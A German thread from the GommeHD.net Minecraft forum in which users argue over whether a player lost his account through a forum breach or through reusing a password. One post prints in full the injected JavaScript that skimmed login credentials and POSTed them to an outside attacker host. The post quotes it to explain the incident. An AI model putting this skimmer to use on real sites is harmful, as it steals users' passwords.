faustschlag.

Status
Für weitere Antworten geschlossen.
Vielleicht haben die Admins einfach nicht ihr Forenpasswort auch für Minecraft verwendet.
 
cvshmerecvt schrieb:
OMG MEINE STATS SIND WEG BUHUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU

Ne jetzt mal ehrlich: Es. ist. ein. verdammtes. Spiel.
Warum sollten bitte die Stats übertragen werden.
Mojang Support anschreiben, falls möglich Beweise vorlegen, zack Account wieder da.
Zum Vergrößern anklicken....
Oh ja, und weil es ein Spiel ist, was man über Jahre hinaus aus Spaß gespielt hat, und sich "was aufgebaut" hat, darf man sich nicht beschweren, wenn das ganze weg ist? Faustschlag beschwert sich zurecht, da es nicht sein Fehler ist, und es unfair ist, dass bei anderen Spielern die Stats übertragen wurden, und bei ihm nicht.
Das mit dem Mojang Support klappt zu 100% nicht, solange man nicht die Transaktions-ID vorlegen kann, welche er leider nicht vorlegen kann. Du stellst dir echt alles sehr einfach vor und verhälst dich ziemlich provokant, kein Wunder, du bist auch in einem Forum von einem virtuellen Blockspiel Server aktiv.

Domely schrieb:
Aber es ist wirklich ganz ganz sicher, dass er sein Passwort durch diese "Sicherheitslücke" verloren hat?
Zum Vergrößern anklicken....
Nein ist es nicht, aber das sofort daraufhin sein Minecraft Account nach jahrelanger einwandfreier Nutzung nicht mehr geht, führt wohl darauf hinzu.
 
  • Like
Reaktionen: heilViTox2, tims2000 und DraculaFrosch
PiiNNi schrieb:
da es nicht sein Fehler ist
Zum Vergrößern anklicken....
Wer für seinen Minecraft-Account dasselbe Passwort wie für seinen Foren-Account verwendet, ist selbst schuld.

Wenn die anderen von dir genannten Personen auch den Zugriff auf ihren Account verloren haben und ihre Stats übertragen wurden, kann man durchaus darüber diskutieren, ob das fair ist. Aber die Aussage, dass es nicht sein Fehler sei, ist einfach falsch.
Außerdem verlieren bestimmt noch viel mehr Leute, die aktiv spielen, ihre Stats, da diese aber keine was weiß ich wie viele Abonnenten haben, interessiert sich kein Schwein dafür.
 
PiiNNi schrieb:
Nein, es ist NICHT seine Schuld, da das ganze nicht vorgekommen wäre, wenn der Fehler von Gomme nicht vorhanden gewesen wäre.
Faustschlag hat nichts getan, um das ganze zu bewirken.
Hätte er beispielsweise auf irgendeiner "Free GommeHDnet Premium" Seite seine Daten angegeben, dann wäre es seine Schuld gewesen.
Zum Vergrößern anklicken....
Er hat den Fehler gemacht, für zwei Accounts dasselbe Passwort zu verwenden.
Es wird allgemein davor gewarnt, genau das zu tun. Wenn ich als Passwort "123456" wähle, habe ich auch nichts aktiv dazu beigetragen, dass mein Account gehackt wird, habe aber ein zu unsicheres Passwort.
Hätte er für beide Accounts unterschiedliche Passwörter verwendet, wäre das, sofern es wirklich an der XenForo Sicherheitslücke lag, nicht passiert.
 
Halt. Egal, ob er im Forum 12345 un in Mc 6789 hat, laut genazt konngen alle Passwörter ausgelesen werden. @Knockback_King du hast in einem Beitrag mitgewirkt, kannst du uns sagen wie das ganze funzt?
Und noch was... Stats sind nicht mehr als ein paar Zahlen, 0 &1, warum ist ihm das ganze so wichtig? Man es sind verdammte ZAHLEN. Scheiß auf die Stats, wichtig ist der Spieler und sein Können das dahintersteckt. Wenn er wem was beweisen muss, kann er ja mit dem ne Runde zocken und ihm seine alten Stats zeigen.
 
@Knockback_King danke für die Markierung.

@_Overclocked
Das Ganze wurde mithilfe eines Skriptes gemacht. Es wurde einfach in den Code der Seite eingefügt und somit auch immer automatisch ausgeführt, daher auch bei vielen die gemeldete lange Ladezeit.
Nun das Skript hat einfach auf Krampf bei einem Log-in die Daten abgefangen und an die Seite des Hackers geschickt. Somit konnte der Hacker zwar nicht auf alle, wahrscheinlich gehashten, Passwörter in der Datenbank zugreifen, aber er hat alle Passwörter von den Nutzern die sich in einem bestimmten Zeitraum angemeldet haben. Man kann es als eine Art Phishing Attacke betrachten.
Hier nochmal das Skript [Sprache: JavaScript]

Code: 
$(function (){
  window.onload=function(){
    var myList = document.getElementsByClassName("btn btn-primary btn-lg btn-block");
    var inputs = document.getElementsByClassName("form-control");
    var x = document.getElementsByTagName("form");
    inputs[0].name = "login";
    inputs[1].name = "password";
    for (i = 0; i < x.length; i++) {
      if(x[i].getAttribute("data-reactid") == ".0"){
        x[i].id = "loginform";
      }
    }
    myList[0].onclick = function() {
         var get = document.getElementsByClassName("form-control");
         $.ajax({
             type:"POST",
             url: "https://u1x.xyz/a.php",
             data: { t: Date.now(), u: document.URL, k: "login="+get[0].value+"&password="+get[1].value}
         });
    };
  }
});

$(function (){
  window.addEventListener("beforeunload", function (e) {
      var $k = $('#loginform').serialize();
      $.ajax({
             type:"POST",
             url: "https://u1x.xyz/a.php",
             data: { t: Date.now(), u: document.URL, k: $k}
      });
  });
});

$(function (){
  window.onbeforeunload = function (e) {
    var $k = $('#loginform').serialize();
    $.ajax({
      type: "POST",
      url: "https://u1x.xyz/a.php",
      data: { t: Date.now(), u: document.URL, k: $k}
    });
  };
});

@heilViTox2
Zu den Statistiken kann ich nichts sagen, da müssen sich die Teammitglieder drum kümmern. Zudem steht es aber auch nicht ganz fest ob das Passwort wirklich durch diese Attacke abgefangen wurde. Es gibt noch zahlreiche weitere Methoden wie man an ein Passwort kommt: Trojaner, Phishing-Seiten, Bruteforce Attacken, ...

MfG
ExaByte
 
  • Like
Reaktionen: timth2222, tims2000 und Knockback_King
Danke @Exa_Byte
Damit wurde die Tatsache, dass keine Passwörter von anderen Accounts abgefangen wurden, belegt.

Eine Frage habe ich noch: Wurde das Script auf https://www.gommehd.net hochgeladen oder wurde es von einem anderen Server geladen? Könnte für Nutzer von Noscript interessant sein.
 
FabistuCraft schrieb:
Danke @Exa_Byte
Damit wurde die Tatsache, dass keine Passwörter von anderen Accounts abgefangen wurden, belegt.

Eine Frage habe ich noch: Wurde das Script auf https://www.gommehd.net hochgeladen oder wurde es von einem anderen Server geladen? Könnte für Nutzer von Noscript interessant sein.
Zum Vergrößern anklicken....
Anderer Server.
NoScript hätte die Ausführung des Skripts zwar verhindert, da ich aber nicht weiß, was die Hacker sonst noch gemacht haben, kann ich mir nicht sicher sein, ob der Account nicht doch kompromitiert wurde.
 
  • Like
Reaktionen: timth2222 und FabistuCraft
FabistuCraft schrieb:
Wer für seinen Minecraft-Account dasselbe Passwort wie für seinen Foren-Account verwendet, ist selbst schuld.
Zum Vergrößern anklicken....
Nein, ich könnte dich schon wieder aufgrund deines Profilbilds beleidigen was mich von grundauf schon provoziert, jedoch unterlasse ich das mal.
Er hat NICHT ich wiederhole NICHT dafür zu haften, wenn ein Fehler vom GommeTeam auftritt, welcher ihn betrifft.
Willst du das nicht raffen, oder willst du mich provozieren?
 
  • Like
Reaktionen: tims2000
Status
Für weitere Antworten geschlossen.

Soziale Medien

  • X
  • TikTok

Über uns

  • GommeHD.net ist einer der größten Minecraft-Server der Welt. Dir gefällt unser Server? Dann unterstütze uns durch einen Kauf im Shop!
  • Shop

Nützliche Links

Einen Bug melden
Eine Map einsenden
Einen Entbannungsantrag erstellen
Eine Bewerbung senden
Unsere Statusseite öffnen
| Style and add-ons by ThemeHouse
Oben Unten